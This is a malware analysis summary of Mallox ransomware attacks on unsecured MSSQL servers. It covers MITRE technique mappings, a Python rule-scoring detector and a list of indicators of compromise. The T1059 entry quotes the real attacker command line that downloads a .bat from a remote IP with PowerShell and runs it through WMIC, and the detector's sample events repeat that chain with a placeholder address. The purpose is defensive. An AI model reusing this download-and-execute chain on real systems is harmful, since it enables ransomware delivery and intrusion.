Mallox Ransomware Strikes Unsecured MSSQL Servers

Mallox ransomware targets unsecured Microsoft SQL Servers to gain initial access and then unleashes a complex infection chain to encrypt files and drop a ransom note. It exfiltrates data to a C2 and uses a Tor onion-based site for attacker communications while disabling system protections to maximize impact.
Read more: https://blogs.quickheal.com/mallox-ransomware-strikes-unsecured-mssql-servers/

Keypoints

  • Mallox targets unsecured Microsoft SQL Servers using brute force attempts to gain initial access.
  • Infection chain leverages tzt.bat, a .NET payload, and process hollowing to inject ransomware into system processes.
  • Files are encrypted with a .Mallox extension after deleting shadow copies and modifying boot/configuration settings.
  • The ransomware uses a ransom note named File Recovery.txt containing a Tor onion link for decryption discussions.
  • Exfiltration of targeted system information to a C2 and a public onion-based data-exposure site is described.
  • Defensive measures include whitelisting, offline backups, and Quick Heal signatures for Mallox variants.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Used to run commands via cmd.exe and PowerShell to fetch and execute the payload. Observed command line: "C:\WINDOWS\System32\cmd.exe" /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile("http[:]//43[.]138[.]76[.]102/Mfhigwwvsie[.]bat", "%TEMP%\tzt.bat") >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create "%TEMP%\tzt.bat"
  • [T1490] Inhibit System Recovery – Deletes shadow copies and modifies boot configuration to hinder recovery. “it disables the Shutdown, Restart, and Sign-out options”
  • [T1083] File and Directory Discovery – Traverses folders and uses FindFirstFileExW to exclude whitelisted folders. “It traverses all the folders and uses API “FindFirstFileExW” to exclude the whitelisted folders.”
  • [T1082] System Information Discovery – Checks language/locale to tailor the attack. “Firstly, it checks the default language ID for the current user to exclude some countries from the targeted attack.”
  • [T1486] Data Encrypted for Impact – Encryption of files as part of the payload. “The injected payload of the Mallox Ransomware is the main module that contains the country check, deletion of the shadow copy, termination of running processes, and encryption.”
  • [T1489] Service Stop – Termination of processes and related service disruption to enable encryption. “The second thread modifies the Boot Configuration and terminates some of the hardcoded processes.”
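The T1059 chain listed above (cmd.exe writing a downloader .ps1 into %TEMP%, running it with -ExecutionPolicy Bypass, then launching the dropped .bat through WMIC) is more reliable to detect as a scored combination than as any single string. The Python below is an added detection example, not code from the Quick Heal post; the event line format, the rule weights and the 192.0.2.10 download address are assumptions.

```python
import re

# Constructed sample process-creation events (not from the original post);
# each line: <timestamp> <host> parent=<parent image> cmd=<command line>.
SAMPLE_EVENTS = [
    # Full chain as described for T1059: SQL service spawns cmd.exe, writes a
    # downloader .ps1 to %TEMP%, runs it with -ExecutionPolicy Bypass, then WMIC
    # launches the dropped .bat. The download IP is a documentation-range placeholder.
    '2024-05-01T10:01:02Z db01 parent=sqlservr.exe cmd="C:\\WINDOWS\\System32\\cmd.exe" /C '
    'echo $cl = New-Object System.Net.WebClient >%TEMP%\\updt.ps1 & '
    'echo $cl.DownloadFile("http://192.0.2.10/x.bat", "%TEMP%\\tzt.bat") >> %TEMP%\\updt.ps1 & '
    'powershell -ExecutionPolicy Bypass %TEMP%\\updt.ps1 & WMIC process call create "%TEMP%\\tzt.bat"',
    # Benign: an interactive shell listing a directory.
    '2024-05-01T10:05:00Z db01 parent=explorer.exe cmd="C:\\WINDOWS\\System32\\cmd.exe" /C dir C:\\Users',
    # Benign-looking: a scheduled script run with Bypass but not from %TEMP%.
    '2024-05-01T10:07:30Z app02 parent=services.exe cmd=powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
    # Partial chain: a single weak indicator that stays below the alert threshold.
    '2024-05-01T10:09:00Z app02 parent=cmd.exe cmd=powershell -ExecutionPolicy Bypass %TEMP%\\setup.ps1',
]

# (rule name, weight, pattern). Weights are an assumed triage scoring, not from the post.
RULES = [
    ("sql_service_spawns_shell", 3, re.compile(r"parent=sqlservr\.exe\s.*cmd=.*cmd\.exe", re.I)),
    ("webclient_downloadfile", 2, re.compile(r"Net\.WebClient|DownloadFile", re.I)),
    ("script_written_to_temp", 1, re.compile(r">\s*%TEMP%\\\S+\.ps1", re.I)),
    ("powershell_bypass_from_temp", 2, re.compile(r"powershell.*-ExecutionPolicy\s+Bypass.*%TEMP%", re.I)),
    ("wmic_process_create_bat", 2, re.compile(r"WMIC\s+process\s+call\s+create.*\.bat", re.I)),
    ("download_from_bare_ip", 1, re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", re.I)),
]

def score_event(line):
    """Return (score, [matched rule names]) for one process-creation event."""
    hits = [name for name, _, pat in RULES if pat.search(line)]
    score = sum(w for name, w, _ in RULES if name in hits)
    return score, hits

def triage(events, threshold=5):
    """Return alert dicts for events whose summed rule score reaches the threshold.
    Bypass alone is common in admin scripts; the chain is what is distinctive here."""
    alerts = []
    for line in events:
        score, hits = score_event(line)
        if score >= threshold:
            alerts.append({"host": line.split()[1], "score": score, "hits": hits})
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```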

Indicators of Compromise

  • [IP] 43.138.76.102 – used to download malicious payload via HTTP in the initial script
  • [URL] http://43.138.76.102/Mfhigwwvsie.bat – BAT file downloaded during infection
  • [URL] https://files.catbox.moe/r6piiq.vdf – encrypted VDF payload downloaded from C2
  • [Hash] 77BFCEE98F086C8E25A69D252A6609E1 – Bat loader hash
  • [Hash] 08D4D184E6E3484E8B676FA0E0A24AFA – Loader payload hash
  • [Hash] 1B7578D04324CD6C8BF11985B79A814A – Encrypted payload hash
  • [Domain] wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhklvlrexljoyuklaad.onion – Onion-based C2/communication site
  • [File] File Recovery.txt – Ransom note filename dropped on infected hosts